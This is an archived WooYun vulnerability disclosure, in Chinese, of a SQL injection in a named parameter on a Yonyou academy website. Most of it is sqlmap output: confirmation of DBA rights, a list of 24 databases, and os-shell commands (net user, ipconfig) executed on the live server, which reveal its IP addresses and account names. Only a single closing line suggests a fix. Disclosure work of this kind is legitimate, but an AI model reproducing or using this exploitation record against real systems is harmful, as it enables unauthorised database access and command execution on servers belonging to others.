乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-16: 细节已通知厂商并且等待厂商处理中 2014-12-21: 厂商已经主动忽略漏洞,细节向公众公开
继续一枚吧
SQL注入地址:
http://academy.yonyou.com/ViewZsMap.aspx?der=zproducts&name=N
DBA权限:
[22:33:38] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[22:33:38] [INFO] testing if current user is DBAcurrent user is DBA: True[22:33:38] [INFO] fetched data logged to text files under 'D:\Python27\sqlmaptput\academy.yonyou.com'[*] shutting down at 22:33:38
表名:
web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[22:34:10] [INFO] fetching database names[22:34:11] [INFO] the SQL query used returns 24 entriesavailable databases [24]:[*] JYSTimber_px[*] master[*] model[*] msdb[*] tempdb[*] Timber_CP_EIS[*] Timber_CP_ENT[*] Timber_Exam_Gov[*] Timber_Exam_Org_01[*] Timber_Exam_Org_Wx[*] Timber_Exam_Shangqi[*] Timber_Exam_YL[*] Timber_Live[*] Timber_px[*] Timber_PX_ENS[*] Timber_PX_ENS2[*] Timber_PX_ENS_AP[*] Timber_PX_New_lexue_ceshi[*] Timber_PX_New_YY[*] Timber_PX_New_yy2[*] Timber_PX_New_YY_Temp[*] Timber_PX_YH[*] Timber_PX_yonyou[*] Timber_Tianming[22:34:11] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\otput\academy.yonyou.com'[*] shutting down at 22:34:11
可执行CMD命令进行提权:
os-shell> net userdo you want to retrieve the command standard output? [Y/n/a] y[22:35:30] [INFO] the SQL query used returns 8 entries[22:35:31] [INFO] retrieved: " "[22:35:31] [WARNING] cannot properly display Unicode characters inside WindowsS command prompt (http://bugs.python.org/issue1602). All unhandled occurances wll result in replacement with '?' character. Please, find proper character reprsentation inside corresponding output files.[22:35:31] [INFO] retrieved: "\\\\\\\\ ?????"[22:35:31] [INFO] retrieved: " "[22:35:31] [INFO] retrieved: "-----------------------------------------------..[22:35:32] [INFO] retrieved: "Administrator \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?..[22:35:32] [INFO] retrieved: "??????????????????"[22:35:32] [INFO] retrieved: " "[22:35:32] [INFO] retrieved: " "command standard output:---\\ ?????-------------------------------------------------------------------------------Administrator \?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0Guest \?a0\?a0\?a0\?a\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0\?a0Administrator Guest??????????????????---os-shell> ipconfigdo you want to retrieve the command standard output? [Y/n/a] y[22:35:49] [INFO] the SQL query used returns 38 entries[22:35:49] [INFO] retrieved: " "[22:35:50] [INFO] retrieved: "Windows IP ??"[22:35:50] [INFO] retrieved: " "[22:35:50] [INFO] retrieved: " "[22:35:51] [INFO] retrieved: "?????? ????:"[22:35:51] [INFO] retrieved: " "[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..[22:35:51] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0IPv4 ?? . . . . . . . . . . . . ..[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..[22:35:52] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..[22:35:53] [INFO] retrieved: " "[22:35:53] [INFO] retrieved: "????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF..[22:35:53] [INFO] retrieved: " "[22:35:53] [INFO] retrieved: " \\\\?a0\\\\?a0???? \\\\?a0. . . . . . . . . . ..[22:35:54] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..[22:35:54] [INFO] retrieved: " "[22:35:54] [INFO] retrieved: "????? 6TO4 Adapter:"[22:35:55] [INFO] retrieved: " "[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..[22:35:55] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..[22:35:56] [INFO] retrieved: " "[22:35:56] [INFO] retrieved: "????? Teredo Tunneling Pseudo-Interface:"[22:35:56] [INFO] retrieved: " "[22:35:56] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0IPv6 ?? . . . . . . . . . . . . ..[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..[22:35:57] [INFO] retrieved: " \\\\?a0\\\\?a0????. . . . . . . . . . . . . : ..[22:35:57] [INFO] retrieved: " "[22:35:58] [INFO] retrieved: " "[22:35:59] [INFO] retrieved: "Windows IP ??"[22:35:59] [INFO] retrieved: " "[22:35:59] [INFO] retrieved: " "[22:35:59] [INFO] retrieved: "?????? ????:"[22:36:00] [INFO] retrieved: " "[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0????? DNS ?? . . . . . . . : ","..[22:36:00] [INFO] retrieved: " \\\\?a0\\\\?a0???? IPv6 ??. . . . . . . . : fe..command standard output:---Windows IP ???????? ????: \?a0\?a0????? DNS ?? . . . . . . . : ????? DNS ?? . . . . . . . : \?a0\?a0???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839 ???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839 \?a0\?a0IPv4 ?? . . . . . . . . . . . . : 222.191.251.170 IPv4 ?? . . . . . . . . . . . . : 222.191.251.170 \?a0\?a0???? \?a0. . . . . . . . . . . . : 255.255.255.192 ???? . . . . . . . . . . . . : 255.255.255.192 \?a0\?a0????. . . . . . . . . . . . . : 222.191.251.129 ????. . . . . . . . . . . . . : 222.191.251.129????? isatap.{8FFEDB7E-0A57-437F-A1CD-7F9A0F2EF9E4}: \?a0\?a0???? \?a0. . . . . . . . . . . . : ????? ???? . . . . . . . . . . . . : ????? \?a0\?a0????? DNS ?? . . . . . . . : ????? DNS ?? . . . . . . . :????? 6TO4 Adapter: \?a0\?a0????? DNS ?? . . . . . . . : ????? DNS ?? . . . . . . . : \?a0\?a0IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa IPv6 ?? . . . . . . . . . . . . : 2002:debf:fbaa::debf:fbaa \?a0\?a0????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301 ????. . . . . . . . . . . . . : 2002:c058:6301::c058:6301????? Teredo Tunneling Pseudo-Interface: \?a0\?a0????? DNS ?? . . . . . . . : ????? DNS ?? . . . . . . . : \?a0\?a0IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455 IPv6 ?? . . . . . . . . . . . . : 2001:0:9d38:6ab8:1429:162f:2140:455 \?a0\?a0???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455 ???? IPv6 ??. . . . . . . . : fe80::1429:162f:2140:455 \?a0\?a0????. . . . . . . . . . . . . : ????. . . . . . . . . . . . . :Windows IP ???????? ????: \?a0\?a0????? DNS ?? . . . . . . . : ????? DNS ?? . . . . . . . : \?a0\?a0???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839 ???? IPv6 ??. . . . . . . . : fe80::a53e:2b35:3646:f839---os-shell>
修复 降权 过滤再次辛苦了,北京的小伙伴
危害等级:无影响厂商忽略
忽略时间:2014-12-21 14:20
暂无